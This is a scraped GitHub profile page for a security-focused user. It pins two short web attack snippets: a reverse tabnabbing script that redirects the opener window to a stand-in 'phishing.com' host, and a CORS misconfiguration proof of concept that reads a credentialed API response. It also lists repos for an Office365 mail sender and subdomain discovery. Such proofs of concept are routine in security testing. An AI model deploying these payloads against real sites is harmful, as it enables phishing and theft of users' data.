Skip to content
View devhug's full-sized avatar
  • NY

Organizations

@RepublicR0K @iosanalyzer @huggerctf @androidanalyzer

Block or report devhug

Block user

Prevent this user from interacting with your repositories and sending you notifications. Learn more about blocking users.

You must be logged in to block users.

Please don't include any personal information such as legal names or email addresses. Maximum 100 characters, markdown supported. This note will be visible to only you.
Report abuse

Contact GitHub support about this user’s behavior. Learn more about reporting abuse.

Report abuse

Pinned Loading

  1. Reverse Tabnabbing Web Attack | OWAS...
    1
    <script>
    2
    if (window.opener) window.opener.parent.location.replace('http://phishing.com');
    3
    if (window.parent != window) window.parent.location.replace('http://phishing.com');
    4
    </script>
  2. Cross-origin resource sharing miscon...
    1
    <html>
    2
    <script>
    3
    var req = new XMLHttpRequest(); req.onload = reqListener; req.open('get','https://redacted.com/api/users/number',true); req.withCredentials = true; req.send('{}'); function reqListener() { alert(this.responseText); };
    4
    </script>
    5
    </html>
  3. sender Public

    Open source sender (OSS) - Sender inbox all office365

    Python 2 2

  4. subhug Public

    Subdomains online tool to discover subdomains of a target domain.

    Shell

  5. google/leveldb Public

    LevelDB is a fast key-value storage library written at Google that provides an ordered mapping from string keys to string values.

    C++ 37.4k 8k

0 contributions in the last year

Contribution Graph
Day of Week April May June July August September October November December January February March
Sunday
Monday
Tuesday
Wednesday
Thursday
Friday
Saturday
Less
No contributions.
Low contributions.
Medium-low contributions.
Medium-high contributions.
High contributions.
More

Contribution activity

April 2025

devhug has no activity yet for this period.
Loading